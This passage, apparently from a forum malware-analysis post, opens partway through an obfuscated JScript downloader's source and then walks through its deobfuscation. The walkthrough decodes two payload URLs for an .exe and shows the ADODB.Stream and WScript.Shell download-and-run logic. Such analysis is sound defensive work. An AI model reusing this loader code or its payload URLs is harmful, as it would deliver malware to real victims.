    mD[18] = "mY";
    mD[19] = "qK";
    mD[20] = "ZZH";
    mD[21] = "h3";
    mD[22] = "I";
    mD[23] = "f";
    mD[24] = "8D";
    mD[25] = "hLx";
    mD[26] = "48i";
    mD[27] = "P";
    mD[28] = "mhZ";
    mD[29] = "seO";
    mD[30] = "N";
    mD[31] = "s";
    mD[32] = "s";
    mD[33] = "kcI";
    mD[34] = "U9N";
    mD[35] = "fyP";
    var JnJ = mD[28] + mD[21] + mD[19] + mD[8] + mD[5] + mD[10] + mD[6] + mD[1] + mD[15] + mD[12] + mD[18] + mD[32] + mD[25] + mD[13] + mD[26] + mD[14] + mD[23] + mD[16] + mD[24] + mD[0] + mD[33] + mD[17] + mD[20] + mD[29] + mD[7] + mD[2] + mD[31] + mD[34] + mD[30] + mD[35] + mD[27] + mD[11] + mD[4] + mD[22] + mD[9] + mD[3];
    var Cpn = "";
    Cpn = Cpn + J(825 - 771) + J(24 * 3) + J(10230 / 93 - 0) + J(45 + 55) + J(922 - 846) + J(7 * 11) + J(53) + J(824 - 722) + J(244 - 127) + J(4 * 13) + J(85 - 38) + J(336 - 228) + J(2244 / 22 + 0) + J(3 + 86) + J(4 * 19) + J(32 * 2) + J(3 * 17) + J(2616 / 24 + 0) + J(5 * 11) + J(182 - 96) + J(4048 / 46 + 0) + J(327 - 256) + J(2349 / 29 + 0) + J(793 - 697) + J(10764 / 92 + 0) + J(55 + 32) + J(67) + J(713 - 629) + J(3648 / 48 - 0) + J(10 * 7) + J(89) + J(367 - 319) + J(262 - 184) + J(8 * 7) + J(1188 / 22 + 0) + J(25 + 92) + J(7 * 7) + J(334 - 269) + J(16 * 5) + J(2231 / 23 - 0) + J(3 * 17) + J(72 + 3) + J(116 / 1 + 0) + J(6375 / 85 + 0) + J(4225 / 65 - 0) + J(315 - 198) + J(707 - 634) + J(1825 / 25 - 0) + J(907 - 803) + J(3213 / 63 - 0) + J(7110 / 90 + 0) + J(586 - 532) + J(875 - 767) + J(4446 / 39 - 0) + J(387 - 290) + J(38 + 68) + J(8 + 90) + J(53) + J(886 - 767) + J(2380 / 35 - 0) + J(108 + 1) + J(5664 / 59 - 0) + J(46 + 70) + J(4757 / 67 - 0) + J(2773 / 59 - 0) + J(360 / 3 - 0) + J(7 * 11) + J(400 / 4 - 0) + J(90 + 10) + J(266 - 159) + J(70 + 14) + J(741 - 661) + J(8 * 7) + J(550 / 5 - 0) + J(51 + 70);
    var tkc = 207953;
    var aJJ = tkc + 19575;
    var CF = aJJ / 476;
    var xgH = CF - 478;
    OF[QRO("02183F06", JnJ)](QRO("700C3B", Cpn), qnI, xgH);
    try {
        OF[QRO("1B202D53", "hEC7c7RW7l7RcuyQeaHB1yOcRt8hth0hzTpnWp54znW0WJrFDAdcAnUJe5ud6Lag2oK0ud")]();
    } catch (WKY) {
        return 0;
    }
    return 1;
}

function jH(OIM) {
    var EN = "";
    EN = EN + J(1344 / 21 + 0) + J(1070 - 972) + J(10580 / 92 - 0) + J(42 + 62) + J(10881 / 93 - 0) + J(6000 / 60 + 0);
    var lj = EN + OIM;
    return eval(lj);
}

function htU(Tib) {
    var nGi = "";
    nGi = nGi + J(783 / 9 + 0) + J(1044 - 966) + J(97) + J(96 + 9) + J(8600 / 86 + 0) + J(14 * 7) + J(53 + 62);
    var Pt = jH(nGi);

    var yb = DN(Pt);
    var dwe = YjS(Pt);
    var bC = [];
    bC[0] = "emO";
    bC[1] = "ile";
    bC[2] = "in";
    bC[3] = "ect";
    bC[4] = "st";
    bC[5] = "bj";
    bC[6] = "g";
    bC[7] = "Sy";
    bC[8] = "ipt";
    bC[9] = "Scr";
    bC[10] = ".F";
    var npT = bC[9] + bC[8] + bC[2] + bC[6] + bC[10] + bC[1] + bC[7] + bC[4] + bC[0] + bC[5] + bC[3];
    var dSF = new Pt(npT);
    if (jGP(dwe, Tib) == 0)
        return false;


    var cOv = "";
    cOv = cOv + J(41 * 2) + J(9 + 106) + J(1536 / 16 + 0) + J(693 - 578) + J(11136 / 96 + 0) + J(912 / 8 + 0);
    var sn = dwe[cOv];
    var Xdq = 412883;
    var leM = Xdq + 43957;
    var Gcb = leM / 405;
    var NC = Gcb - 928;
    var haS = NC;

    if (sn == haS) {
        var IxV = "";
        IxV = IxV + J(448 / 7 - 0) + J(67) + J(648 - 570) + J(67) + J(5 * 13) + J(4 + 41) + J(41 * 2) + J(5 * 23) + J(432 - 319) + J(84 + 16) + J(32 * 3) + J(490 - 382);
        var gib = new Pt(IxV);
        var SW = VNB(dSF);
        var qU = "";
        qU = qU + J(70 + 8) + J(42 + 69) + J(2400 / 24 - 0) + J(109);
        gib[qU]();
        var cY = "";
        cY = cY + J(83) + J(24 * 5) + J(4884 / 44 + 0) + J(43 + 57);
        var MzJ = 13231;
        var hZ = MzJ + 16865;
        var CAg = hZ / 48;
        var By = CAg - 626;
        gib[cY] = By;

        var yu = "";
        yu = yu + J(54 + 27) + J(20 * 5) + J(6 * 19) + J(7881 / 71 - 0) + J(10 * 11) + J(8720 / 80 - 0) + J(11 + 103) + J(1600 / 16 + 0) + J(275 - 210) + J(75 + 35) + J(9 * 11) + J(27 + 93);
        var yzh = dwe[yu];
        var DZy = "";
        DZy = DZy + J(43 * 2) + J(923 - 810) + J(8 * 13) + J(94 + 21) + J(20 * 5);
        gib[DZy](yzh);
        var Am = "";
        Am = Am + J(69 + 10) + J(33 + 77) + J(6156 / 54 - 0) + J(89 + 15) + J(25 + 90) + J(416 / 4 + 0) + J(90 + 20) + J(109);
        var lm = 260605;
        var YU = lm + 50275;
        var Ny = YU / 580;
        var LC = Ny - 536;
        gib[Am] = LC;
        if (!WN(gib, SW, Pt))
            return false;

        var iSG = "";
        iSG = iSG + J(6 * 11) + J(1087 - 980) + J(5060 / 46 - 0) + J(645 - 531) + J(699 - 599);
        gib[iSG]();
        var Ep = "";
        Ep = Ep + J(3626 / 37 - 0) + J(1108 - 1000) + J(44 + 55) + J(2475 / 55 + 0) + J(23 + 77) + J(5355 / 45 + 0) + J(2100 / 21 - 0) + J(21 + 10) + J(3036 / 66 - 0) + J(2548 / 26 - 0) + J(1984 / 64 - 0);
        var ZzY = Ep + SW;
        var ybc = 118986;
        var NI = ybc + 11627;
        var fi = NI / 397;
        var UF = fi - 329;
        var IIZ = UF;
        var Vp = [];
        Vp[0] = "y7a";
        Vp[1] = "nd";
        Vp[2] = "sjh";
        Vp[3] = "gfs";
        Vp[4] = "qm";
        Vp[5] = "dh";
        Vp[6] = "as";
        Vp[7] = "fs";
        var Jdv = Vp[6] + Vp[4] + Vp[1] + Vp[2] + Vp[0] + Vp[3] + Vp[5] + Vp[7];
        var ft = "";
        ft = ft + J(920 - 872) + J(5 + 43) + J(4214 / 86 - 0) + J(10 * 5);
        IIZ = ygJ(Jdv, Pt, ZzY, ft);

        var gL = 146016;
        var anP = gL + 63364;
        var qXw = anP / 361;
        var mlA = qXw - 570;
        var qvO = mlA;
        if (IIZ < qvO) {
            return BSu(dSF);
        } else {
            return false;
        }

    } else {
        return false;
    }


    return true;
}

function gW(qnI) {
    var cd = htU(qnI);
    if (!cd)
        throw cd;
    return cd;
}

if (qdI()) {
    var Tib = [];

    function BQc() {
        var HK = 417564;
        var yw = HK + 15596;
        var fV = yw / 980;
        var Wlq = fV - 442;
        return 0 + Wlq;
    }

    function cI() {
        var CQS = QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611", "S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");
        return CQS;
    }
    Tib[BQc()] = cI();

    function LK() {
        var Rn = 145782;
        var Qg = Rn + 61631;
        var rq = Qg / 983;
        var DVu = rq - 210;
        return 0 + DVu;
    }

    function WE() {
        var DqW = QRO("3033200363635C17381640261F17591D2D3340522E0A560C175C232510197547555750637C7C4C2E0B01", "XGTsYLssQf5Bza8oLYn1Agyhr7ODbFDvgebSMJbKsdDroDOFuul8AnbHihhMrfxbXv32qlcU3wUxil");
        return DqW;
    }
    Tib[LK()] = WE();
    var nof = false;

    function yVB() {
        var rCq = 243163;
        var pym = rCq + 27887;
        var CHP = pym / 695;
        var THx = CHP - 389;
        return 0 + THx;
    }

    function Yn() {
        var tA = 2288;
        var Doq = tA + 64920;
        var SG = Doq / 271;
        var eMn = SG - 248;
        return 0 + eMn;
    }
    var spI = yVB(),
        Ta = Yn();

    while (!nof) {
        if (Ta > spI)
            break;
        try {
            nof = gW(Tib[Ta]);
        } catch (IwH) {}
        Ta++;
    }
}

2) Main part :

Looking at the parts that are not in functions : an easy way to find the main part from where all other parts will be called.

In this part some declaration of function appears :

=> I didn't put the them here (see the spoiler with the whole code) to let the code clearer.​

if (qdI()) => Main condition : if false, nothing is done : the script ends.
{

var Tib = [];

=> Creation of an empty tab

​

Tib[BQc()] = cI();

=> the result of cl() is put on the tab, at position resultinf of BQc()
=>cl() and BQc() are function calls, that return the good value​

​

Tib[LK()] = WE();

=> the result of WE() is put on the tab, at position resultinf of LK()
=> WE() and LK() are function calls, that return the good value
​

var nof = false;
var spI = yVB(), Ta = Yn();

=> yVB() and Yn() are another functions used to initilize spl and Ta​

while (!nof)
{

if (Ta > spI)

​

=> condition to break => quit the loop While : exit the script (end of the code)

​

break;​

try
{

nof = gW(Tib[Ta]);

=> call gW fonction with parameter : one of the value of the Tib tab : Ta is the index

​

catch (IwH)
{ }
Ta++;​

}​

}

​

We can see that a lot of functions are called, hiding the real data.

I will not directly show you the main simplified part .

The aim of this post is to show the obfuscation methods used, and then the deobfuscation :
I prefer, step by step, show the work that have been made to obfuscate this script.

2-1) Main part - Easy simplifications / deobfuscation :

Let's find what data the functions BQc(), LK(), yVB(), Yn(), cl() and WE() return, to simplify the main part.

function BQc() {

var HK=417564;
var yw=HK+15596;
var fV=yw/980;
var Wlq=fV-442;
return 0+Wlq;​

}
=> return 0 : (0 + ((417564+15596)/980)-442)

function LK() {

var Rn=145782;
var Qg=Rn+61631;
var rq=Qg/983;
var DVu=rq-210;
return 0+DVu;​

}
=> return 1 : (0 + ( (145782+61631)/983) - 210)

function yVB() {

var rCq=243163;
var pym=rCq+27887;
var CHP=pym/695;
var THx=CHP-389;
return 0+THx;​

}
=> return 1 : (0 + ((243163+27887)/695) - 389)

function Yn() {

var tA=2288;
var Doq=tA+64920;
var SG=Doq/271;
var eMn=SG-248;
return 0+eMn;​

}
=> return 0 : (0+((2288+64920)/ 271) - 248)

function cI() {

var CQS= QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");
return CQS;​

}

function WE() {

var DqW= QRO("3033200363635C17381640261F17591D2D3340522E0A560C175C232510197547555750637C7C4C2E0B01","XGTsYLssQf5Bza8oLYn1Agyhr7ODbFDvgebSMJbKsdDroDOFuul8AnbHihhMrfxbXv32qlcU3wUxil");
return DqW;​

}​

cI() and WE() returns some decoded vars, using a function named QRO(parameter1, parameter2)

Let's suppose each value returned is an URL (I will show you later how to find these parts)

Then we can write the new main part :

if (qdI()) => Main condition : if false, nothing is done :the script stops.
{

var Tib = [];

=> Creation of an empty tab

​

Tib[0] = URL1;

=> the result of cl() is put on the tab at index 0

​

Tib[1] = URL2;

=> the result of WE() is put on the tab at index 1

​

var nof = false;
var spI = 1, Ta = 0;

=> yVB() and Yn() are another functions used to initilize spl and Ta​

while (!nof)
{

if (Ta > spI)

​

=> condition to break => quit the loop While : exit the script (end of the code)

​

break;​

try
{

nof = gW(Tib[Ta]);

=> call gW fonction with as parameter : the current URL (Ta : index in the tab Tib)
​

catch (IwH)
{ }
Ta++;​

}​

}

​

- the Tab Tib is initialized with 2 URLs => 2 index : 0 and 1

- In the loop WHILE as long as nof is false (not usefully retrieved / saved / run, current from URL) and current index <= 1

​

- gW function is called

​

To quit the WHILE loop :

- nof = false => break
- TA > spl => current index > 1

=> normal, only 2 URL : index 0 and 1

​

We will see in details gW() functions.

2-1) Main part - URLs :

For the moment, let's find the values returned by cI() and WE()

​

function cI() {

var CQS= QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");
return CQS;​

}

function WE() {

var DqW= QRO("3033200363635C17381640261F17591D2D3340522E0A560C175C232510197547555750637C7C4C2E0B01","XGTsYLssQf5Bza8oLYn1Agyhr7ODbFDvgebSMJbKsdDroDOFuul8AnbHihhMrfxbXv32qlcU3wUxil");
return DqW;​

}

​

Let's begin with cl()

QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");

Two parameters :

- one string that seems HEX VALUES represented on a String
- a second string with chars that seem to be chars from alphabet​

In this function QRO, other functions are called : I will show in Green some of them, and will simplify other parts

function QRO(eQZ, AV)
{

var QJ = HyA(eQZ);

=> eQZ : current string : encoded "3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
=> 88 (length)

​

function HyA(WtD)
{

var XkX = lw();
var cW = Do();
var md = St();
XkX = XkX + dka() + cW + ymC() + md;

=> "length"
​

var ddh = WtD["length"];

return ddh;

=> returns the length of the string
​

}

​

var DIL = PgR();

function PgR() {

var yQ=516582;
var bb=yQ+8898;
var jUh=bb/755;
var XUW=jUh-696;
return 0+XUW;

=> it always returns 0 !!!​

}

​

=> DIL = 0
=> the index of the first char to get from the first string (parameter 1)

​

var Hm = HyA(AV); (same function as above)

=> AV : password string (for the decoding part)
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"
=> Hm = AV.length
=> HM = 77

​

var Tv = [pXY()][TG()];

=> an obfuscate manner to write : Tv = ""
=> [""][0]
=> Tv = ""

​

while (DIL < QJ)

=> while DIL < size of the_fisrt_string
=> DIL begin from 0 and will be incremented to the size of encoded string, here : 88​

{

var un = DIL / Bv();

function Bv() {
var Wx=32391;
var ept=Wx+1427;
var jU=ept/914;
var wBY=jU-35;
return 0+wBY;

=> it always returns 2 !!!​

}

​

=> un = DIL / 2
=> the position of the char to be retrieved from the second string (parameter 2)

​

var nH = eQZ[aW()](DIL);

function aW() {

var GR="";
GR=GR+J(30+68)+J(103)+J(2976/31+0)+J(276-163)+J(154-90)+J(5*23);
=> "c" + "h" + "a" + "r" + "A" + "t"
return GR;

=> it returns "charAt"​

}​

​

=> nH = eQZ["charAt"](DIL);

=> gets the char at position DIL, on the first string (parameter 1)

=> we are on a loop WHILE.
=> at the first passage : DIL : 0
=> nh = eQZ.charAt(0)
=> get the char at position 0, on the first string (parameter 1)
=> nh = "3"
​

DIL = DIL + Hb();

function Hb() {

var CzR=208985;
var gp=CzR+57754;
var xoD=gp/411;
var ZD=xoD-648;
return 0+ZD;

=> it always returns 1 !!!​

}

​

=> DIL = DIL + 1
=> the index of the second char retrived from first string (parameter 1)

​

nH = nH + eQZ[Ua()](DIL);

function Ua() {

var dSE=""; dSE=dSE+J(14*7)+J(103)+J(44+52)+J(60+53)+J(256-192)+J(94+21);
=> "charAt"
return dSE;

=> it returns "charAt"​

}​

​

=> get the char at position DIL, on the first string (parameter 1)

=> in the current loop :
=> nH = nH + eQZ["charAt"](2);
=> nh = nh + "B"
=> nh = "3B"
=> the first two chars of the encoded string
​

DIL = DIL + GuV();

function GuV() {

var QHj=469118;
var mE=QHj+16324;
var riR=mE/543;
var HPx=riR-893;
return 0+HPx;

=> it always returns 1​

}

​

=> DIL = DIL + 1

​

var gD = Hd(nH, vOX());

=> vOX : 16 (for "HEX number")

=> Hd("3B", 16) : Hd is called with the two current values retrieved, and 16 to tell it is HEX

​

=> Hex number to decimal conversion
=> For the current loop :

=> this long function will do "3B" => 59 considering "3B" is an HEX number​

=> parsInt(nH,16) is the simplified version of Hd(nH, vOX())

​

function Hd(tG, yRI)
{
// "3B" and 16 at first call, here

var XEE=72822;
var uxo=XEE+58878;
var kc=uxo/300;
var JiT=kc-438;
var HkD = JiT;
var gcq=102714;
var TQ=gcq+26334;
var oq=TQ/228;
var rP=oq-566;
var Sb = rP;
var YCE=120043;
var PbA=YCE+27693;
var SKR=PbA/313;
var oX=SKR-465;
var iuV = oX;
var EXT="";
EXT=EXT+J(74+37)+J(32*3)+J(7232/64+0)+J(6*19)+J(94+6)+J(557-485)+J(109)+J(20+95);

=> "parseInt"

​

var BAK = EXT;
var sbG="";
sbG=sbG+J(5488/56+0)+J(612-509)+J(32*3)+J(423-310)+J(35+29)+J(99+16);

=> "charAt"

​

var UAR = sbG;

if (Math.cos(HkD) > Sb)

=> if (Math.cos(1) > 0) : always true

​

iuV = eval(BAK);​

else

iuV = eval(UAR);

=> iuv : object parsInt or charAt

=> here ALWAYS : parsInt => to be used below
​

if (Math.sin(HkD) > Sb)

=> if (Math.sin(1) > 0) : always true !!!​

{

var TA = iuV(tG, yRI);

=> TA = parsInt("3B",16)
=> "3B" considered as HEX number
=> converted to decimal number : 59

​

return TA;​

}
else

return HkD;

=> it never reaches here !​

}

​

=> var gD = 59 for the current loop : decimal value of HEX NUMBER represented by the two current chars of first string

=> remember, in this call :

parameter 1 : "3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
parameter 2 :
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"​

​

var Km = AV[nsV()](un % Hm);

​

function nsV() {

var tTu="";
tTu=tTu+J(82+16)+J(103)+J(4992/52-0)+J(15+98)+J(6*11)+J(3630/33+0)+J(8019/81+0)+J(20*5)+J(62+2)+J(60+55);

​

=> "charCodeAt"

​

return tTu;​

}

​

=> var Km = AV["charAt"](postion_in_second_string MODULO length_of_second_string);

=> This method allows to have a variable with a number that could be a position, with a value outside a string (or an array, tab, etc), but using the modulo with the string length, the result is always in the string.

=> to avoid to reset the variable once the value get out the max value.

position = position_outside MODULO length_of_the_string

​

Example : "ABCD"

The increment of a var reaches to 4, but there is only a string of 4 chars

index 0 => "A"
index = index + 1
index 1 => "B"
index = index + 1
index 2 => "C"
index = index + 1
index 3 => "D"
index = index + 1
index 4 => outside the string.

using real_index = index MODULO size_of_the_string
real_index will always been in the string, beginning again by the first char (loop in the string)

real_index = 4 MODULO 4 = 0 => "A"
index = index + 1
real_index = 5 MODULO 4 = 1 => "B"
index = index + 1
real_index = 6 MODULO 4 = 2 => "C"
...
...
real_index = 255 MODULO 4 = 3 => "D"​

​

=> var Km = AV[nsV()](un % Hm);
=> current letter of the second string
=> Km = "S" in the first loop

var WY = gD ^ Km;

=> XOR between the decimal code of the two chars retrieved on parameter 1 and the decimal code of current letter retrieved on parameter 2

=> in the first loop : 59 XOR 83 (I will show an example later with the first 3 loops)​

​

var Qk = String[uQR()](WY);

=> result of the XOR : converted in a string and put in var Qk

=> Example : 59 XOR 83 = 104 => "h"​

​

Tv = Tv + te() + Qk;

=> the decoded string is build

=> firs loop :
=> "" ="" + "h" => "h"​

}
return Tv;

=> The decoded string !​

}

​

In the above function / sub-function, there is a lot of calls to J() function.
I choose to write the result of the calls, and will only show the complete J() function / sub functions in a next part.

QRO function can seem difficult, some obfuscation has been made.
So this is an example, for the 3 first loops int the While part :

QRO("3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611","S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO");

"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

- first positions (one for the first string, one for the second)

​

"3B" => 59
"S" => 83

​

=> 59 XOR 83 = 104
=> "h"

​

current decoded string : "htt"

​

- New positions :

"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"47" => 71 decimal
"3" => 51 decimal

​

=> 71 XOR 51 = 116 => "t"

​

current decoded string : "htt"

​

- New positions:

"3B473F3C7D757D0F3F43675D171B3D1A1916021B7E172217550C533B36391928487A0056415F445E48161611"
"S3KLGZRxH4I4yoXhuwcuPtMzzh6PZXkwyK2dsouhfsnt2fImNYoYf5O0NLopZBwL0PP3bpoNfFQnO"

"3F" => 63
"K" => 75

=> 63 XOR 75 = 116 => "t"​

​

current decoded string : "htt"

​

etc,...

​

RESULTS :

cI();

=> "http ://www .interlaan.com/deklar_11222016.exe"

​

WE();

=> "http ://dipudevaraj.com/deklar_11222016.exe"​

​

2-2) Main part -simplified :

if (qdI()) => Main condition : if false, nothing is done : the script stops.
{

var Tib = [];

=> Creation of an empty tab
​

Tib[0] = "http ://www .interlaan.com/deklar_11222016.exe";

​

Tib[1] = "http ://dipudevaraj.com/deklar_11222016.exe";

​

var nof = false;
var spI = 1, Ta = 0;

​

while (!nof)
{

if (Ta > spI)

=> condition to break => quit the loop While : exit the script (end of the code)

​

break;​

try
{

nof = gW(Tib[Ta]);

=> call gW fonction with as parameter : the current URL (Ta : index in the tab Tib)
​

catch (IwH)
{ }
Ta++;​

}​

}

​

Two parts have not already be shown : qdI() and gW(url)

2-3) The if part :

if (qdI())
{
...
...
}​

When I have first seen the if part, I wondered "how small can be this function"

Let's see the "strange part of this script"...

function qdI()
{

var Uh = eval("ActiveXObject");
var Rl = new Uh(oh());

=> new "ActiveXObject(oh())

​

var WuR="";

WuR=WuR+J(551-435)+J(109)+J(161-55)+J(418-309)+J(10*11)+J(1043-925)+J(229-120);

var XkB = WuR;

var oQ = (typeof Rl[CWZ()] == XkB);

if (!oQ) return oQ;

oQ = (typeof Rl[tDk()] == XkB);

return oQ;​

}

​

We can easily see that an ActiveX Object is created, but the string as parameter is hidden by a call to a function named oh().

For the moment, let's see the other parts).

The return value, oQ, is a Boolean (true or false) : result of the test "is typeof DATA == XkB ?"

=> two comparison with XkB

Let's find the String returned by oh().

oh()

function oh()
{

var h=21632;
return XOA()+yUo();

=> calls two other functions !​

}

function XOA()
{
var NRA=53614;
return I()+TwY();

=> calls two other functions !​

}
function yUo()
{
var OO=51481;
return wG()+gR();

=> calls two other functions !​

}

​

I think you have understood, now : oh() : a function that call a function that calls functions that calls functions, etc...

When I was deobuscating the oh() function, some time passed ... and I was still on sub-functions ...

This is the simplified view :

ok() function used around 80 different functions ...

A the end of some "last" functions, in several parts, a char is returned.
All the below code has one goal : build this string : "ADODB.Stream"​

The most important function is J(value) we have seen it in a precedent part.​

​

=> Looking in the details, we can see it is the biggest part​

You can look in the spoiler code part :

The J() function with all its sub-function only makes in reality a small thing :

J(Value) => returns String.fromCodeCharCode(Value+1)​

Details in the part, but simplified (I have mainly wrote the name of the functions called, not all the useless code inside)

Oh() =>XOA()+yUo();

        => XOA() => I()+TwY();

            => I() => bYp()+MN()

                    => bYp => Hjz() : "A"
                    => MN() =>  lP() +SuU()
 
                        => IP() => xEQ() : "D"
                        => SuU() = return J(4+74)

                            The function J(..) is a very important function, called several times from other parts of the script
     
                            var Kk=842271;
                            var IJ=Kk+44517;
                            var q=IJ/918;
                            var a=q-965; => = 1
                            var Qk = eval(Mr() + (DK+a) + aKq());
             
                                => Mr() => iW()+adq()
             
                                            => iW() => s()+ ryJ()
                         
                                                        => s() => sm()+kd()
                                     
                                                                    =>  Wed()+ye()
                                                 
                                                                        => Wed() => A() : "S"
                                                                        => ye()    => pT() : "t"
                                                     
                                                                => kd() =>  QTN()+ xcT()
                                                     
                                                                        => QTN() => j() :  "r"
                                                                        => xcT() => ih()+ l()
                                                     
                                                                                    => ih() : "i"
                                                                                    => l() : "n"
                                             
                                                        => ryJ() => sd()+ yVO()
                                     
                                                                    => sd() => pe()+ Glt()
                                                 
                                                                                => pe(0) : "g"
                                                                                => Glt() : eval("String.fromCharCode(19+27)" : "."
                                                 
                                                                    => yVO() => haG()+Whd()
                                                 
                                                                                => haG() =>  eval("String.fromCharCode(249-147)") : "f"
                                                                                => Whd() => OfW()+Pv()
                                                             
                                                                                            => OfW() => eYh() : "r"
                                                                                            => Pv() => eH() : "o"
                                                                     
                         
                                            => adq() =>  NT()+id()
                         
                                                            => NT() => M()+Z()
                                         
                                                                        => M() => rPV()+ us()
                                                     
                                                                                    => rPV() => TR() : "m"
                                                                                    => us() ; "C"
                                                                 
                                                                        => Z() => jR()+E
                                                     
                                                                                    => jR() : "h"
                                                                 
                                                                                    => E() => aU()+dad()
                                                                 
                                                                                                => aU() => WgE() : "a"
                                                                                                => dad() => eval("String.fromCharCode(865-751)") : "r"
                                                     
                                                            => id() => jq()+e()
                                         
                                                                        => jq() => GhP()+FV()
                                                     
                                                                                    => GhP() => H() : "C"
                                                                                    => FV() => eval("String.fromCharCode(409-298)") : "o"
                                                                 
                                                                        => e() => OTU()+vff()
                                                     
                                                                                    => OTU() => eval("String.fromCharCode(24+76)") : "d"
                                                                 
                                                                                    => vff() => kx()+N()
                                                                             
                                                                                                => kx() : eval("String.fromCharCode(60+41)") : "e"
                                                                                                => N() => wDH() : "("                                    
                 
                                Then : Mr() : "String.fromCodeCharCode("
             
                                => DK+a = (78+1) : value + 1
             
                                => aKq() =>  eval("String.fromCharCode(262-221)"): ")"
             
                                Conlusion : for J(value) => eval("String.fromCodeCharCode(" + (value+1) + ")"
                                => J(value) = String.fromCodeCharCode(value+1)
             
                                J(78) => "O"
             
                            For the moment, we have "A" + "D" + "O" only :p


            => Twy() => xzm()+Be()
 
                        => xzm() =>J(67) => using what we have learnt above for J(value) funtion :
                                         => String.fromCodeCharCode(value+1)
                                         => String.fromCodeCharCode(68)
                     
                                         => "D"
     
                        => Be() => Q()+jrF()
     
                                    => Q() => qw() : "B"
                 
                                    => jrF() => J(2385/53-0)
                                             => J(45)
                                             => String.fromCodeCharCode(46)
                         
                                             => "."
     
        => yUO() => wG()+gR()

                    => wG() => rbT()+mVZ()
 
                                => rbT() => "S"
                                => mVZ() => POQ()+ nL()
             
                                            => POQ() => J(6785/59-0) : "t"
                                            => nL() => Rw() : "r"

                    => gR() => Fxm()+NL()

                                => Fxm() => mXR() : "e"
                                => NL()  => RA()+ Ws()

                                        => RA() => xT() : "a"
                     
                                        =>  Ws() : J(36*3) => J(108) => "m"

Let's see again the function call by the if from the main part :

function qdI()
{

var Uh = eval("ActiveXObject");
var Rl = new Uh(oh());

=> new ActiveXObject("ADODB.Stream")
=> create a Stream object

​

var WuR="";

WuR=WuR+J(551-435)+J(109)+J(161-55)+J(418-309)+J(10*11)+J(1043-925)+J(229-120);

=> now, we know what J(value) make !

=> the values are not put in clear, but with operations
=> J(116)+J(109)+J(106)+J(418-309)+J(10*11)+J(1043-925)+J(229-120);
=>values : 116 , 109, 106,110 , 118, 109
=> charcodes : 117 , 110, 107, 111, 119, 110
=> "u" + "n" + "k" + "o" + "w" + "n" (with ALT+ code)​

=> WuR = "unknown"

​

var XkB = WuR;

=> "unkown"

​

var oQ = (typeof Rl[CWZ()] == XkB);

=> CWZ() => YA()+Imt()

=> YA() => vq()+Hk()

=> vq() => J(35+31) : "C"
=> Hk() => J(302-195) : "l"​

=> Imt() => BP()+VUd()

=> BP() => VNo() => "o"​

=> VUd() => sI()+uKr()​

=> sI() => J(6*19) : "s"
=> uKr() => J(348-248) : "e"

​

=> var oQ = (typeof Stream["Close"] == "unknown"

=> return a boolean (true or false)

=> if no : the stream.Close method is unknown.
=> test if stream.Close method is "unknown"

=> here : oQ always true!

​

if (!oQ) return oQ;

=> if "not" "unknown" : return true
=> will never be used, because we have just seen oQ is always true, here​

oQ = (typeof Rl[tDk()] == XkB);

​

=> same method than CWZ() : functions / sub-functions

=> tDk() => "Position"
=> test if stream.Position method is "unknown"
=> oQ always true​

return oQ;​

}

​

Here this function always returns true, because the type of data returned is always "unknown" (if running under the good environment).

Remark : on the other sample : начисления_xls.js (see at the end of this post)

The Boolean true or false are the result of one test :

var E = (typeof QWi[iHx()] == "object";
=> typeof object_recordset_fields

=> returns "object" (and no "unknown") if running under the good environment ​

​

2-4) The main function gW(URL) :

nof = gW(Tib[Ta]);

=> Tib[Ta] : current URL (Ta will be 0 or 1)

The script stops if :

- one of these URLs worked and the payload has been run,
- none of these URLs worked
- errors occurred for each URLs or steps (false returned)​

function gW(qnI)
{

var cd = htU(qnI);
if (!cd)
throw cd;
return cd;​

}​

=> htU(qnI)

- downloads the payload from URL that is given as parameter : qnI
- saves it on the HDD
- runs it

function htU(Tib)
{

var nGi="";
nGi=nGi+J(783/9+0)+J(1044-966)+J(97)+J(96+9)+J(8600/86+0)+J(14*7)+J(53+62);

=> "XObject"

​

var Pt = jH(nGi);

=> Pt = ActiveXObject object - not the string "ActiveXObject" !

​

var yb = DN(Pt);

​

function DN(ayd)
{

var wC = new ayd(QRO("144B501D5E32151C2758215D16","C83o7Ba2t0D1zn3tfqUcMUag2g8hwJlsWgdXjD9rtYWDbxF2uQrnf64sJOKWzGaqgAj8716EyG"));
=> new ActiveXObject("Wscript.Shell")
return wC;​

}

​

